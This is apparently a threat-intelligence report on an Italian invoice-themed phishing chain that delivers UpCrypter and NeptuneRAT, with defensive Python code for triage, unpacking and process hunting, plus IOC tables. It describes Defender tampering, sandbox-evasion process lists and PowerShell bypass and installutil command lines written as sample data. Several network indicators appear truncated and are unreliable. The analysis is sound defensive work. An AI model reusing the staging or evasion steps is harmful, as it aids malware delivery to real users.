Since February 2026, we have been tracking an invoice-themed malware campaign targeting Italian users and organizations. The messages are written in Italian and abuse a familiar business pretext: a short invoice notification that asks the recipient to open an attached HTML document. The lure is minimal, credible enough for a busy inbox, and designed to move the victim from email to browser to script execution.
One of the analyzed emails used the subject Nostra fattura nr. 91B ("Our invoice no. 91B"). The body asked the recipient to review the attached document to view the invoice details. The attachment was named Fattura_00121.html.

The attached HTML file is intentionally small. It redirects the browser to a phishing page hosted at https://pillarsesolution[.]com/i#..., where the URL fragment contains the recipient's email address encoded in Base64. A fragment is never sent to the server as part of the HTTP request, so if it ends up in server-side logs the landing page's own script must read it client-side and forward it. The threat actor likely uses this identifier to track victims and to record, in a dropzone, the addresses of users who reached the phishing page and went on to download the malicious ZIP package.
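The triage an analyst would run on such an attachment, as an added example that is not the campaign's HTML and not the original analysis tooling. The sample markup is constructed, since the real Fattura_00121.html is not reproduced here; it assumes the redirect is a meta refresh and/or a window.location assignment, and that the fragment is Base64 (standard or URL-safe, padding optional). Host and encoded address in the sample are placeholders, not indicators.

```python
"""Triage an HTML invoice attachment that exists only to redirect the browser."""
from __future__ import annotations

import base64
import re
from urllib.parse import urlsplit

# Constructed sample: host and encoded address are placeholders, not IOCs.
SAMPLE_HTML = """<html><head><meta charset="utf-8">
<meta http-equiv="refresh" content="0; url=https://landing.example.invalid/i#dmljdGltQGV4YW1wbGUuaXQ">
</head><body>
<script>window.location.href = "https://landing.example.invalid/i#dmljdGltQGV4YW1wbGUuaXQ";</script>
</body></html>"""

META_REFRESH = re.compile(
    r"""http-equiv\s*=\s*["']refresh["'][^>]*?content\s*=\s*["']\s*\d+\s*;\s*url\s*=\s*([^"'>\s]+)""",
    re.IGNORECASE,
)
JS_ASSIGN = re.compile(r"""location(?:\.href)?\s*=\s*["']([^"']+)["']""", re.IGNORECASE)
JS_REPLACE = re.compile(r"""location\.(?:replace|assign)\(\s*["']([^"']+)["']""", re.IGNORECASE)
EMAIL = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


def find_redirects(html: str) -> list[str]:
    """Return every redirect target found in the markup, in order, de-duplicated."""
    found = META_REFRESH.findall(html) + JS_ASSIGN.findall(html) + JS_REPLACE.findall(html)
    seen: set[str] = set()
    return [u for u in found if not (u in seen or seen.add(u))]


def decode_fragment(url: str) -> str | None:
    """Base64-decode the URL fragment; None when absent or not Base64/UTF-8.

    The fragment is never sent to the server in the HTTP request, so anything
    logged from it is read by the landing page's script and posted back.
    """
    frag = urlsplit(url).fragment
    if not frag:
        return None
    data = frag.replace("-", "+").replace("_", "/")   # accept URL-safe alphabet
    data += "=" * (-len(data) % 4)                     # restore stripped padding
    try:
        return base64.b64decode(data, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def visible_words(html: str) -> int:
    """Count words a user would actually see, ignoring scripts and tags."""
    body = re.sub(r"<script.*?</script>", "", html, flags=re.IGNORECASE | re.DOTALL)
    body = re.sub(r"<[^>]+>", " ", body)
    return len(body.split())


def triage(html: str) -> dict:
    """Summarise why the attachment looks hostile: redirect-only page plus a tracked victim id."""
    targets = find_redirects(html)
    decoded = [decode_fragment(u) for u in targets]
    tracked = [d for d in decoded if d and EMAIL.match(d)]
    return {
        "redirect_targets": targets,
        "tracked_email": tracked[0] if tracked else None,
        "redirect_only": bool(targets) and visible_words(html) < 5,
    }


if __name__ == "__main__":
    print(triage(SAMPLE_HTML))
```

A redirect-only verdict together with a decoded mailbox address in the fragment is enough to block the message; the decoded address also tells you exactly which recipient the actor can now mark as "reached the page".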
The landing page presents a polished download interface in Italian. It tells the user that the document is ready, displays Fattura_00121.pdf, marks it as protected, and invites the user to click Scarica File ("Download File"). This visual layer matters: the chain does not rely on the attachment executing anything itself, but on making the transition from email to download feel routine.

When the victim clicks the download button, the page requests https://bonanza.davidsabido[.]com/wp-includes/images/ic/i.php. The server-side logic appears to gate delivery by user agent: Windows browser user agents receive a ZIP archive, while non-Windows or otherwise unsuitable clients are redirected to a generic PDF hosted on Google Drive. This split keeps the campaign looking benign under casual inspection and avoids delivering the Windows payload to environments unlikely to execute it. When retrieving the archive for analysis, send a Windows browser user agent; a default command-line client will only be handed the decoy.
In the last analyzed case, the ZIP archive was B00225511855210021-00551.zip and contained a heavily obfuscated JavaScript file named B00225511855210021-00551.js. Double-clicking the .js file runs it under Windows Script Host (wscript.exe), which starts the real infection chain. The script builds and launches a PowerShell command with an execution-policy bypass, then drops and executes additional PowerShell stages under C:\Users\Public.
The first decoded PowerShell stage checks connectivity against www.google.com, flushes the DNS cache, disables or weakens Windows Defender settings, and compares running process names against a list of analysis tools. That list includes names such as handle, autorunsc, Dbgview, tcpvcon, any.run, sandbox, tcpview, OLLYDBG, ImmunityDebugger, Wireshark, apateDNS, and analyze. If the environment looks suspicious, execution may stop or the host may be restarted.
After these checks, the malware downloads 03.txt from a meusitehostgator[.]com[.]br domain. The downloaded data is parsed after a %x% marker and reconstructed as a .NET loader, ClassLibrary3, which PowerShell loads directly in memory through reflection ([System.Reflection.Assembly]::Load), so the loader is never written to disk as a DLL. This behavior matches public reporting on UpCrypter campaigns: JavaScript and PowerShell act as staging layers, while an MSIL loader prepares and deploys the final payload.

The final PowerShell stage, sgyof.ps1, was recovered from Joe Sandbox. It is a UTF-16LE PowerShell file containing a large byte array. That byte array loads a .NET assembly in memory through [System.Reflection.Assembly]::Load(...) and invokes ClassLibrary1.Class1.Run(...). The embedded assembly contains RunPE functionality and a nested .NET executable.
Extracting the nested executable revealed the final payload. It is a .NET GUI executable internally identified as MasonClient.exe. Its strings include MasonRAT, MasonGroup, NeptuneRAT V5.3, and the C2 configuration afxwd[.]ddns[.]net:143. This indicates that UpCrypter is the delivery and loading framework, while the malware deployed in this case is NeptuneRAT, which labels itself MasonRAT in its own strings and configuration.
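The two steps just described, rebuilding the assembly from the UTF-16LE stage and carving the executable nested in it, as an added example that is not the campaign's code and not the tooling used in the original analysis. The stage is constructed: a minimal MZ/PE stub stands in for the ClassLibrary1 assembly and a second stub for the nested executable, with placeholder strings. It assumes the byte array is a comma-separated [Byte[]] literal of 0x.. or decimal values (the exact literal style of sgyof.ps1 is not shown here) and that the nested executable is stored unencrypted, so its MZ/PE headers are visible to a scan.

```python
"""Recover the in-memory .NET assembly from a UTF-16LE PowerShell stage and carve the PE nested in it."""
from __future__ import annotations

import re
import struct

BYTE_ARRAY = re.compile(r"\[byte\[\]\][^=]*=\s*@?\(?\s*([0-9A-Fa-fx,\s]+)", re.IGNORECASE)
TOKEN = re.compile(r"0x[0-9A-Fa-f]{1,2}|\d{1,3}")
HOST_PORT = re.compile(r"\b[a-z0-9][a-z0-9.-]+\.[a-z]{2,}:\d{2,5}\b", re.IGNORECASE)


def decode_stage(raw: bytes) -> str:
    """The recovered stage is UTF-16LE; the BOM is optional."""
    if raw.startswith(b"\xff\xfe"):
        raw = raw[2:]
    return raw.decode("utf-16-le")


def extract_byte_array(script: str) -> bytes:
    """Rebuild the bytes the script hands to [System.Reflection.Assembly]::Load()."""
    m = BYTE_ARRAY.search(script)
    if not m:
        raise ValueError("no [Byte[]] literal in script")
    values = [int(t, 16) if t.lower().startswith("0x") else int(t) for t in TOKEN.findall(m.group(1))]
    if any(v > 255 for v in values):
        raise ValueError("literal contains a value above 0xFF")
    return bytes(values)


def is_pe(buf: bytes, off: int = 0) -> bool:
    """MZ at off and e_lfanew (DOS header offset 0x3C) pointing at a PE\\0\\0 signature."""
    if buf[off:off + 2] != b"MZ" or len(buf) < off + 0x40:
        return False
    e_lfanew = struct.unpack_from("<I", buf, off + 0x3C)[0]
    sig = off + e_lfanew
    return e_lfanew >= 0x40 and buf[sig:sig + 4] == b"PE\0\0"   # 0x40: sanity bound, not a PE rule


def carve_nested_pe(image: bytes) -> bytes | None:
    """First valid PE header after offset 0; returns the tail from that header
    (a production carve would size it from the section table instead)."""
    pos = image.find(b"MZ", 1)
    while pos != -1:
        if is_pe(image, pos):
            return image[pos:]
        pos = image.find(b"MZ", pos + 1)
    return None


def ascii_strings(buf: bytes, min_len: int = 6) -> list[str]:
    return [s.decode() for s in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, buf)]


def c2_candidates(buf: bytes) -> list[str]:
    """host:port tokens among the strings, the shape the C2 setting takes in the payload."""
    return [h for s in ascii_strings(buf) for h in HOST_PORT.findall(s)]


def _fake_pe(payload: bytes) -> bytes:
    """Constructed stub: 0x40-byte DOS header, e_lfanew=0x40, PE\\0\\0, then payload."""
    hdr = bytearray(0x40)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)
    return bytes(hdr) + b"PE\0\0" + payload


def build_sample_stage() -> bytes:
    """Constructed stage in the shape described for sgyof.ps1; all strings are placeholders."""
    inner = _fake_pe(b"\0" * 8 + b"MasonClient-sample\0c2.example.invalid:143\0")
    outer = _fake_pe(b"ClassLibrary1.Class1.Run\0" + inner)
    literal = ",".join(f"0x{b:02X}" for b in outer)
    script = f"[Byte[]]$asm = @({literal})\n[System.Reflection.Assembly]::Load($asm)\n"
    return b"\xff\xfe" + script.encode("utf-16-le")


def unpack(raw: bytes) -> dict:
    """Decode, rebuild the loader, carve the nested PE and pull triage strings from it."""
    image = extract_byte_array(decode_stage(raw))
    nested = carve_nested_pe(image) if is_pe(image) else None
    return {
        "loader_is_pe": is_pe(image),
        "nested_pe_offset": len(image) - len(nested) if nested else None,
        "nested_strings": ascii_strings(nested) if nested else [],
        "c2_candidates": c2_candidates(nested) if nested else [],
    }


if __name__ == "__main__":
    print(unpack(build_sample_stage()))
```

On a real stage, feed the recovered loader and the carved executable to a .NET decompiler; the string scan here only confirms you carved the right thing (RunPE names in the loader, RAT branding and a host:port in the payload) before spending time on it.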
The sandbox behavior supports this conclusion. Joe Sandbox captured sgyof.ps1 as a dropped file and detected NeptuneRAT in PowerShell memory dumps and unpacked PE artifacts. Other sandboxes stopped earlier in the chain, likely because the loader checks for analysis environments and specifically includes sandbox-related process names. This explains why some environments observed only gdwfw.txt, tpkws.txt, or np.txt, while Joe Sandbox progressed far enough to recover the final PowerShell stage.
For defenders, the user-facing lesson is simple: an HTML attachment that immediately redirects to a document download page should be treated as hostile, especially when the email uses generic invoice language and high-priority headers. For analysts, the important point is that the campaign is not a single malware family from the first stage onward. It is a layered delivery chain where UpCrypter stages and executes a final RAT payload.
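For the analyst side of that lesson, a process-creation hunt for the chain in the order it runs on the host (script host to PowerShell with a bypass, stages under C:\Users\Public, then installutil.exe). This is an added example, not a rule from the page or any vendor. The events are constructed in a Sysmon Event ID 1 shape; the exact command lines are assumptions, since the page only states that the JS launches PowerShell with an execution-policy bypass, stages files under C:\Users\Public and later abuses installutil.exe. File names under C:\Users\Public reuse names from the indicator table; stage.dll is a placeholder.

```python
"""Process-creation hunt for the JS -> PowerShell -> LOLBin chain."""
from __future__ import annotations

import re
from collections import defaultdict

EP_BYPASS = re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+bypass", re.IGNORECASE)
PUBLIC_DIR = re.compile(r"c:\\users\\public\\", re.IGNORECASE)
POWERSHELL = {"powershell.exe", "pwsh.exe"}
WSH = {"wscript.exe", "cscript.exe"}

# Constructed events (host, image, parent image, command line); ws02 is a benign admin script.
EVENTS = [
    {"host": "ws01", "image": r"C:\Windows\System32\wscript.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\Downloads\B00225511855210021-00551.js"'},
    {"host": "ws01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"powershell.exe -ep bypass -w hidden -f C:\Users\Public\tzhgg.ps1"},
    {"host": "ws01", "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"installutil.exe /logfile= /LogToConsole=false /U C:\Users\Public\stage.dll"},
    {"host": "ws02", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
]


def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def wsh_spawns_powershell(e: dict) -> bool:
    """Script host launching PowerShell: the hand-off from the .js lure."""
    return _base(e["parent"]) in WSH and _base(e["image"]) in POWERSHELL


def powershell_bypass_public_stage(e: dict) -> bool:
    """Execution-policy bypass combined with a stage under C:\\Users\\Public."""
    return (_base(e["image"]) in POWERSHELL
            and bool(EP_BYPASS.search(e["cmdline"]))
            and bool(PUBLIC_DIR.search(e["cmdline"])))


def installutil_from_powershell(e: dict) -> bool:
    """installutil.exe is a signed .NET LOLBin; PowerShell as its parent is unusual."""
    return _base(e["image"]) == "installutil.exe" and _base(e["parent"]) in POWERSHELL


RULES = [wsh_spawns_powershell, powershell_bypass_public_stage, installutil_from_powershell]


def hunt(events: list[dict]) -> list[tuple[str, str]]:
    """(host, rule name) for every event that matches a rule."""
    return [(e["host"], r.__name__) for e in events for r in RULES if r(e)]


def chained_hosts(hits: list[tuple[str, str]], min_rules: int = 2) -> list[str]:
    """Hosts where at least min_rules distinct stages fired: the chain, not a one-off match."""
    per_host: dict[str, set[str]] = defaultdict(set)
    for host, rule in hits:
        per_host[host].add(rule)
    return sorted(h for h, rules in per_host.items() if len(rules) >= min_rules)


if __name__ == "__main__":
    found = hunt(EVENTS)
    for host, rule in found:
        print(f"{host}: {rule}")
    print("chain on:", chained_hosts(found))
```

The bypass-only rule is deliberately not enough on its own: an admin running a script with -ExecutionPolicy Bypass from cmd.exe (ws02) produces no hit, while the wscript parent and the Public staging directory each add a signal that ordinary administration rarely has. The Run value and the LocalLow persistence path from the indicator table would need registry and file events, which this process-only view does not cover.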
Network indicators:

| Type | Indicator |
|---|---|
| Redirect landing page | https://pillarsesolution[.]com/i#<base64-email> |
| Download handler | https://bonanza.davidsabido |
| ZIP payload | https://bonanza.davidsabido |
| Decoy PDF | https://drive.google.com/file/d/1XASle6sijkTrXEX_Elyk0C_R5uP33Oe-/view |
| Stage host | andrefelipedonascime1778799406970.2241107.meusitehostgator |
| Stage URL | https://andrefelipedonascime1778799406970.2241107.meusitehostgator |
| Secondary payload URL | https://viveturetiro |
| C2 | afxwd |
File hashes:

| File | SHA-256 |
|---|---|
| R Nostra fattura nr. 91B.eml | 1d4b0079863f439199fa58f83ff85d229685f652042eb2f0181008c0cc38b3cb |
| Fattura_00121.html | c3114ff7d4837dd11334ef841f5861e834efea948c56c72d1f64c1e93a5fa2fa |
| B00225511855210021-00551.zip | 5437ccfa4cd32dff8908884a8ca328e6b7b8fd4b41ad78344668c60baed7c556 |
| B00225511855210021-00551.js | bd56e7dd350b63c5492ebac88bcb8f2a9a45c0c0050f52f786dcae948eab9145 |
| 01.txt | 2f2b5290c5339b94d80342172590f17300150870ea9416ab6661e1cb38c9ac0d |
| 03.txt / gdwfw.txt | fa894470086ee4fb5ee581b398b0828f22e9397aa840a2f79dd2945e867220b3 |
| np.txt | 3d9b98e3aa9b467d08d5f21648d629228766af21fe396b99c3fb326581eba0f3 |
| ybftw_01.ps1 | 3b6c29bdec7980e3b8d9c4f4e676e1775f512c11d7ab6816d1ae27600d547993 |
| sgyof.ps1 | 774663b9d66b6c310c78e98140fbda1a738181be3ab7722f4ab94430cc54c2b8 |
| Extracted ClassLibrary1 RunPE DLL | 7438de9978d21abe51d13229a225caab6b3990494a27b888b02cfe365cc47181 |
| Extracted MasonClient.exe / NeptuneRAT payload | 545eacb0c871d22484c2e3d55dc8ae0951f4a48c2b5abba7063081ffcbd20b81 |
Host indicators:

| Type | Indicator |
|---|---|
| Temporary path | C:\Users\Public\gdwfw.txt |
| Temporary path | C:\Users\Public\tpkws.txt |
| Temporary path | C:\Users\Public\tzhgg.ps1 |
| Temporary path | C:\Users\Public\ybftw_01.ps1 |
| Persistence path | C:\Users\<user>\Windows Update\AppData\LocalLow\LocalLow Windows\Program Rules\Program Rules NVIDEO\Program Rules\Program Rules NVIDEO\sgyof.ps1 |
| Registry persistence | HKCU\Software\Microsoft\Windows\CurrentVersion\Run |
| Registry value observed | Drivers Update-752 |
| LOLBin abused | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe |